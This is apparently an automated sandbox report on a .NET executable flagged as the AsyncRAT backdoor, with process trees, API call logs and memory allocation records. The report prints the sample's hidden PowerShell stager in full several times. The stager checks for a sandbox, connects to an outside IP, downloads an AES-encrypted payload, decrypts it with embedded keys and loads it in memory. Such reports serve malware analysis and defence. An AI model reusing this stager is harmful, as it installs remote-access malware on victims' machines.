Summary | ZeroBOX

originalbuild.exe

Generic Malware, Antivirus, PE File, PE32, .NET EXE, PowerShell

Category:   FILE
Machine:    s1_win7_x6401
Started:    April 28, 2023, 5:07 p.m.
Completed:  April 28, 2023, 5:13 p.m.

Size:    236.0KB
Type:    PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:     9f9583b07cf9622b9db6299ca6157012
SHA256:  8bad05c9f2e4195e80bd90d02d6a08a398b8d93a475b6eb3ef950f4d1380f73c
CRC32:   CFF2DABB
ssdeep:  3072:6NI/Wm20P4bTAI6c3BGQBEhXPmYoI/0O/K4/DMzAwpcq0BYvZ79R9VsCsruA+u14:Rumj4bP6/bCuQkMcq3BZRHfsaA+u1IOq

Yara
  • Is_DotNET_EXE - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

  • originalbuild.exe (PID 2644) "C:\Users\test22\AppData\Local\Temp\originalbuild.exe"
    • powershell.exe (PID 2744) "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols);

Name  Response  Post-Analysis Lookup
No hosts contacted.

IP Address     Status  Action
164.124.101.2  Active  Moloch
91.215.85.198  Active  Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API         Arguments                  Status  Return  Repeated
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameA   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
Time & API          Arguments   Status  Return  Repeated
IsDebuggerPresent               0 0
IsDebuggerPresent               0 0
IsDebuggerPresent               0 0
IsDebuggerPresent               0 0
Time & API     Arguments   Status  Return  Repeated
WriteConsoleW  (one call per console line below; console_handle values 0x00000023 through 0x00000283; every call Status 1, Return 1, Repeated 0)

buffer, in call order:
Method invocation failed because [System.Text.StringBuilder] doesn't contain a
method named 'new'.
At line:1 char:683
+ if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -6553
6;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::Fr
omBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]:
:UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars
= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('N
jExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheol
s.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.Get
Stream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 3000
00; $keuperSheols = [System.Text.StringBuilder]::new <<<< (); $keuperSheols.App
endLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMo
urner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASC
II.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0,
$outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vul
gareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dis
pose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray();
$mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetStr
ing($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encodi
ng]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]);
$mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbar
Gutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode
= [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [Syst
em.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Conve
rt]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbar
Gutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $cro
wbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgar
e.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulg
are.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.
MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStre
am; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgar
e, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitos
Gutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Refl
ection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]
::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outw
arsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64
String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8
.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulg
are = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMuc
una = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mourner
Sheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))
); #($mournerSheols, $mournerSheols);
+ CategoryInfo : InvalidOperation: (new:String) [], RuntimeExcept
ion
+ FullyQualifiedErrorId : MethodNotFound
You cannot call a method on a null-valued expression.
At line:1 char:711
+ if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -6553
6;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::Fr
Time & API      Arguments                                                                                                Status  Return  Repeated
CryptExportKey  crypto_handle: 0x00369500  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369600  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369600  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369600  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369600  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369600  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369600  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x003690c0  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x003690c0  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x003690c0  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369980  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369a80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369200  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369e80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369e80  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369680  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369680  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369680  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369680  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369680  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
CryptExportKey  crypto_handle: 0x00369680  buffer: <INVALID POINTER>  flags: 0  crypto_export_handle: 0x00000000  blob_type: 6   1       1       0
Time & API            Arguments   Status  Return  Repeated
GlobalMemoryStatusEx              1       1       0
Time & API  Arguments  Status  Return  Repeated

Common to every call below: protection: 64 (PAGE_EXECUTE_READWRITE), process_handle: 0xffffffff, stack_dep_bypass: 0, stack_pivoted: 0; Status 1, Return 0, Repeated 0. The varying arguments per call:

API                      process_identifier  base_address  region_size / length  allocation_type      heap_dep_bypass
NtAllocateVirtualMemory  2644                0x008f0000    region_size: 1769472  8192 (MEM_RESERVE)   0
NtAllocateVirtualMemory  2644                0x00a60000    region_size: 4096     4096 (MEM_COMMIT)    1
NtProtectVirtualMemory   2644                0x727a1000    length: 4096          -                    0
NtProtectVirtualMemory   2644                0x727a2000    length: 4096          -                    0
NtAllocateVirtualMemory  2644                0x00dc0000    region_size: 1769472  8192 (MEM_RESERVE)   0
NtAllocateVirtualMemory  2644                0x00f30000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x003e2000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x00415000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x0041b000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x00417000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x003fc000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x00640000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x00406000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x0040a000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x00407000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x00641000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x00642000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x003fa000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2644                0x00644000    region_size: 4096     4096 (MEM_COMMIT)    1
NtProtectVirtualMemory   2644                0x73282000    length: 4096          -                    0
NtAllocateVirtualMemory  2644                0x00645000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x028e0000    region_size: 1638400  8192 (MEM_RESERVE)   0
NtAllocateVirtualMemory  2744                0x02a30000    region_size: 4096     4096 (MEM_COMMIT)    1
NtProtectVirtualMemory   2744                0x6ecf1000    length: 4096          -                    0
NtAllocateVirtualMemory  2744                0x0266a000    region_size: 4096     4096 (MEM_COMMIT)    1
NtProtectVirtualMemory   2744                0x6ecf2000    length: 8192          -                    0
NtAllocateVirtualMemory  2744                0x02662000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02672000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02a31000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02a32000    region_size: 8192     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x0269a000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02673000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02674000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x026eb000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x026e7000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x0266b000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02692000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x026e5000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02675000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x0269c000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x04bf0000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02676000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x026ec000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02693000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02694000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02695000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02696000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02697000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02698000    region_size: 4096     4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory  2744                0x02699000    region_size: 4096     4096 (MEM_COMMIT)    1
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols);
cmdline "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $crowbarVulgare = 
$crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols);
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2748
thread_handle: 0x0000037c
process_identifier: 2744
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); 